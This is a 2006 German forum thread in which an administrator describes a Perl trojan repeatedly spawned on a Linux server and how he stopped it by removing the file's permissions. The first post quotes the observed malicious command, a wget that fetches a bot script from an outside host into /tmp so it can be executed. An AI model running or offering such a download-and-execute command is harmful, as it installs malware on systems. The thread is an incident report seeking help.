Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: riesen Problem Trojaner auf Linux Server

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 24.02.2006, 10:40   #1
bjt
 
riesen Problem Trojaner auf Linux Server - Standard

riesen Problem Trojaner auf Linux Server



Hi,

ich habe foglendes Problem seit gestern 15 Uhr wurde der Server immer langsamer weil ungefähr 100 dieser Prozesse "perl /tmp/.sql.err.3913" liefen.

Diese Datei .sql.err.3913 existiert und ist ein Trojaner. Wenn ich die Datei lösche und alle "perl /tmp/.sql.err.3913" Prozesse kille wird über die /usr/sbin/httpd ein wget befehl gestartet der wie folgt aussieht:

DEN `LINK NICHT ANKLICKEN!!!!!!!!!!!

sh -c wget http://www.pivadesign.com.br/rc/linuxdaybot.txt -O /tmp/.sql.err.3913 ...

DEN `LINK NICHT ANKLICKEN!!!!!!!!!!!

Dieser Prozess hat als Überprozess die /usr/sbín/httpd

so dieser tolle prozess oben lädt die datei linuxdaybot.txt herunter. Ich habe mit meinem Top gesicherten windows pc mal diese adresse aufgerufen und sofort hat Der Antivirus ihn erkannnt und unschädlich gemacht er sagte es ist ein Trojaner. Der Befehl da oben lädt die Datei runter und verschiebt sie nach /tmp/.sql.err.3913 wo sie so alle 5 min. erneut ausgeführt wird. In der txt Datei steht perl Quellcode drin

Die Seite http://www.pivadesign.com.br gibts da kommt man auf ne brasilianische webdesign seite. Ich könnte ausrasten wieso hat einer so ne Datei auf seinem Webspace liegen und wie kann ich den Melden das der nen Trojaner auf seinem Server hat den mein Server andauernd runterlädt.

Ich bin total ratlos was soll ich jetzt machen?

Anm.
-----------------------
Aktive Links editiert!

Gruß Cidre
Admin TB

Geändert von Cidre (24.02.2006 um 17:13 Uhr)

Alt 24.02.2006, 10:59   #2
bjt
 
riesen Problem Trojaner auf Linux Server - Standard

riesen Problem Trojaner auf Linux Server



*lol*

jetzt habe ich der runtergeladenen Datei im temp Ordner mal alle rechte entzogen dann die restlichen Prozesse gekillt und siehe da es kommt kein wget befehl mehr und datei wird auch nicht mehr ausgeführt

aber schön ist das trotzdem nicht

angenommen ich würde datei wieder aus dem temp verzeichnnis entfernen gehe ich mal davon aus der spaß dann wieder von vorn losgeht
__________________


Antwort

Themen zu riesen Problem Trojaner auf Linux Server
adresse, antivirus, befehl, datei, erneut, gestartet, klicke, klicken, langsamer, link, links, linux, lädt, melde, melden, problem, problem trojaner, prozesse, quellcode, ratlos, seite, serve, server, total, trojaner, verschiebt, webspace, windows



Ähnliche Themen: riesen Problem Trojaner auf Linux Server


  1. XOR-Botnetz: Gehackte Linux-Server lösen DDoS-Fluten aus
    Nachrichten - 05.10.2015 (0)
  2. Mumblehard: Tausende Linux-Server als Spam-Schleuder missbraucht
    Nachrichten - 29.04.2015 (0)
  3. Ghost: Uralte Lücke in Glibc bedroht Linux-Server
    Nachrichten - 28.01.2015 (0)
  4. Akamai warnt vor Linux-Server-Botnet
    Nachrichten - 04.09.2014 (0)
  5. Riesen Problem
    Plagegeister aller Art und deren Bekämpfung - 04.06.2013 (5)
  6. Hintergrund: Desinfec’t vom Linux-Server booten
    Nachrichten - 02.08.2012 (0)
  7. Riesen Problem
    Plagegeister aller Art und deren Bekämpfung - 04.12.2009 (2)
  8. Riesen Windows Problem
    Alles rund um Windows - 23.03.2008 (6)
  9. Hab ein riesen Problem
    Alles rund um Windows - 24.08.2007 (2)
  10. Linux als Server benutzen. wie?
    Alles rund um Mac OSX & Linux - 16.08.2007 (1)
  11. riesen Problem
    Überwachung, Datenschutz und Spam - 03.01.2007 (12)
  12. Riesen Problem
    Log-Analyse und Auswertung - 29.08.2005 (3)
  13. riesen problem mit trojaner, brauche dringend hilfe!!!
    Plagegeister aller Art und deren Bekämpfung - 27.06.2005 (6)
  14. Riesen Problem
    Plagegeister aller Art und deren Bekämpfung - 15.05.2005 (9)
  15. Riesen Problem!!!!
    Log-Analyse und Auswertung - 10.03.2005 (6)
  16. Riesen Problem!!
    Alles rund um Windows - 05.03.2005 (5)
  17. Riesen Problem!
    Plagegeister aller Art und deren Bekämpfung - 25.05.2004 (5)

Zum Thema riesen Problem Trojaner auf Linux Server - Hi, ich habe foglendes Problem seit gestern 15 Uhr wurde der Server immer langsamer weil ungefähr 100 dieser Prozesse "perl /tmp/.sql.err.3913" liefen. Diese Datei .sql.err.3913 existiert und ist ein Trojaner. - riesen Problem Trojaner auf Linux Server...
Archiv
Du betrachtest: riesen Problem Trojaner auf Linux Server auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.